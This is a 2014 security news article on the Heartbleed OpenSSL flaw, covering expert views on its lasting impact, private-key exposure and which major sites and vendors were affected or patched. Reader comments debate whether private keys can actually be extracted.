Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Vulnerabilities / Threats //

Advanced Threats

04:35 PM
Connect Directly

Heartbleed Will Go On Even After The Updates

What's next now that the mindset is 'assume the worst has already occurred?'

The fallout from the Heartbleed bug likely will be felt for a long time, but the immediate and urgent questions top of mind are which sites and products are affected, and which have been fixed. Then what? The scary reality is that even after a site or product is patched and users have changed their passwords, Heartbleed will not be over.

It is impossible to discern whether nation-states or well-funded cyber-criminals had already known and exploited the flaw for the past two years it's been in circulation in OpenSSL. This bug has also a long tail that spreads to internal networks, applications, and some mobile devices. Digital certificates have been exposed, and what was once a reliable and secure connection, SSL, has been compromised.

"OpenSSL is more than websites: it's server communications, products shipped with black boxes... those are going to take a while to update. Heartbleed is going to have a long-term affect and the industry is going to have to work pretty hard to fix it," says Barrett Lyon, founder & CTO of Defense.Net, a DDoS mitigation firm. "People are getting very diligent and updating things very quickly... But there are always going to be stragglers."

Dan Kaminsky, the security expert who discovered and coordinated the patching of the DNS caching flaw in 2008, says the Heartbleed disclosure represents a whole different ballgame. Kaminsky, who is co-founder and chief scientist at White Ops, says it's traditionally been the case where a bug is found, and the message is now go and fix it.

"In the case of Heartbleed, the presumption is that it's already too late, that all information that could be extracted, has been extracted, and that pretty much everyone needs to execute emergency remediation procedures," Kaminsky said today in a blog post. "It's a significant change, to assume the worst has already occurred."

Adam Vincent, CEO of Cyber Squared, says Heartbleed is a "security-changing event" with far-reaching repercussions. First, cyber-espionage actors are able to decrypt any encrypted information siphoned via this flaw. "They can find and retrieve the private key of a server that encrypted the traffic to begin with. If they have one to ten years' worth of traffic and were using that same private key, then they have encrypted content and have the private key to decrypt it," Vincent says.

Sophisticated and well-heeled cyber-criminals could target corporations or government agencies by using Heartbleed to gain a foothold into a vulnerable, internal server, Vincent notes. They can write a program that collects information from that server. Bad actors likely already are at work exploiting this:  "I wouldn't be surprised if some sophisticated organization started pointing a sensor at vulnerable websites while [the site operators] were hustling to get them protected -- capturing as much information as they can on a large scale," he says. "The question is, how long have the bad guys known about [Heartbleed]?"

What to do now
The list of affected sites is a moving target, but several major sites have revealed their statuses. Amazon.com, Twitter.com, HootSuite, and LinkedIn were not affected by the flaw, but Pinterest, Tumblr, and Yahoo are. Mashable has a checklist of the status of major sites here.

Google says it has patched Google Search, Gmail, YouTube, Wallet, Play, Apps, and App Engine prior to the Heartbleed announcement on Monday. Google Chrome and Chrome OS, and the newest Android versions are immune. Android 4.1.1 is affected by the bug, according to Google, and its partners are receiving patch information.

Google Cloud SQL, Compute Engine, and Search Appliance are in the process of getting patched, according to Google. Facebook, meanwhile, patched prior to the Heartbleed disclosure. "We haven't detected any signs of suspicious account activity that would suggest a specific action, but we encourage people to take this opportunity to follow good practices and set up a unique password for your Facebook account that you don’t use on other sites," a Facebook spokesperson said.

Amazon Web Services was affected and has been updated.

Several networking vendors have released updates for products using the doomed OpenSSL version, including Cisco Systems, Juniper Networks, and F5 Networks. Software vendors RedHat, Sophos, and VMware have affected products. A full list and links to vendor updates is available from Carnegie Mellon CERT.

In an analysis of cloud providers susceptible to Heartbleed, Skyhigh found that 368 cloud providers -- including top backup, human resources, security, collaboration, ERM, and storage providers -- had not updated their software 24 hours after the Heartbleed patch was issued.

Meanwhile, experts say, keep calm. Be aware that spammers already are using Heartbleed as a lure for spam and phishing emails about changing passwords, and don't rush to change passwords until the Heartbleed-affected site, service, or vendor, has confirmed that it has patched for the OpenSSL flaw and has a new digital certificate.

There's now a free third-party Google Chrome browser extension available called Chromebleed that screens websites for vulnerability to Heartbleed vulnerability.

Kelly Jackson Higgins is the Executive Editor of Dark Reading. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ... View Full Bio

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
User Rank: Apprentice
4/17/2014 | 10:09:14 PM
We must assume the worst
This flaw has been in circulation for years (plural).  It could have been exploited by anyone during that time.

It is unbelievable that nobody discovered this flaw until last week, especially since the source code is freely available.  There are many smart bad guys out there.

Everyone who is known to be affected must assume that all encrypted communication using keys stored or accessed via OpenSSL are compromised.

I agree that the repercussions will be felt for years.  
User Rank: Strategist
4/14/2014 | 2:06:15 PM
Protect Against Zero-day vulnerabilities
This may seem alarming to some but intelligence agencies are in the business of discovering, purchasing, and otherwise exploiting vulnerabilities. There are countless individuals and organizations that discover and sell zero-day vulnerabilities. Responsible disclosure practices are what allow customers to protect themselves against zero-day vulnerabilities. Many organizations who purchase zero-day vulnerabilities on the open market vet those from whom they purchase zero-day vulnerabilities and require that the researcher who finds the zero-day lives by responsible disclosure rules.
User Rank: Apprentice
4/14/2014 | 10:35:20 AM
It is 100% sure that Malsubjects will continue to use the Heartbleed Bug as one of the many tools in their toolbox to continue stealing information from out-of-date systems!
Tim Silverline
Tim Silverline,
User Rank: Apprentice
4/12/2014 | 12:06:17 PM
Re: We need proof
CloudFlare has now admitted that two hackers have accomplished the feat:




User Rank: Ninja
4/11/2014 | 3:56:00 PM
Re: We need proof
And they say they have put up a site for others to try and crack, so far no one has found any keys.  I can't seem to find anyone that can show a proof of concept where they have gotten the private keys yet.

Plenty of other data can be grabbed, but without the key to decrrypt it what do you get?

Kelly Jackson Higgins
Kelly Jackson Higgins,
User Rank: Strategist
4/11/2014 | 3:43:51 PM
Re: We need proof
CloudFlare just put up an interesting post looking at this very topic...how it's doable to grab the private key, but not easy. Basically, what Rob Graham of Errata Security said. http://blog.cloudflare.com/answering-the-critical-question-can-you-get-private-ssl-keys-using-heartbleed
User Rank: Ninja
4/11/2014 | 2:32:17 PM
We need proof
Has anyone anywhere been able to show that the private keys can actually be obtained?

Even the proof of concept excercises have not shown that any private keys can be obtained.

Please provide some providence for the claim that private keys have been compromised or even can be obtained.
Ransomware Is Not the Problem
Adam Shostack, Consultant, Entrepreneur, Technologist, Game Designer,  6/9/2021
How Can I Test the Security of My Home-Office Employees' Routers?
John Bock, Senior Research Scientist,  6/7/2021
New Ransomware Group Claiming Connection to REvil Gang Surfaces
Jai Vijayan, Contributing Writer,  6/10/2021
Register for Dark Reading Newsletters
White Papers
Cartoon Contest
Write a Caption, Win an Amazon Gift Card! Click Here
Latest Comment: This comment is waiting for review by our moderators.
Current Issue
The State of Cybersecurity Incident Response
In this report learn how enterprises are building their incident response teams and processes, how they research potential compromises, how they respond to new breaches, and what tools and processes they use to remediate problems and improve their cyber defenses for the future.
Flash Poll
The State of Ransomware
The State of Ransomware
Ransomware has become one of the most prevalent new cybersecurity threats faced by today's enterprises. This new report from Dark Reading includes feedback from IT and IT security professionals about their organization's ransomware experiences, defense plans, and malware challenges. Find out what they had to say!
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2021-06-14
A buffer overflow vulnerability in SonicOS allows a remote attacker to cause a Denial of Service (DoS) by sending a specially crafted request. This vulnerability affects SonicOS Gen5, Gen6, Gen7 platforms, and SonicOSv virtual firewalls.
PUBLISHED: 2021-06-14
magento-scripts contains scripts and configuration used by Create Magento App, a zero-configuration tool-chain which allows one to deploy Magento 2. In versions 1.5.1 and 1.5.2, after changing the function from synchronous to asynchronous there wasn't implemented handler in the start, stop, exec, an...
PUBLISHED: 2021-06-14
net/can/bcm.c in the Linux kernel through 5.12.10 allows local users to obtain sensitive information from kernel stack memory because parts of a data structure are uninitialized.
PUBLISHED: 2021-06-14
Cross-site Scripting (XSS) vulnerability in the main dashboard of Ellipse APM versions allows an authenticated user or integrated application to inject malicious data into the application that can then be executed in a victim’s browser. This issue affects: Hitachi ABB Power Grids ...
PUBLISHED: 2021-06-14
Improper Input Validation vulnerability in Hitachi ABB Power Grids Relion 670 Series, Relion 670/650 Series, Relion 670/650/SAM600-IO, Relion 650, REB500, RTU500 Series, FOX615 (TEGO1), MSM, GMS600, PWC600 allows an attacker with access to the IEC 61850 network with knowledge of how to reproduce the...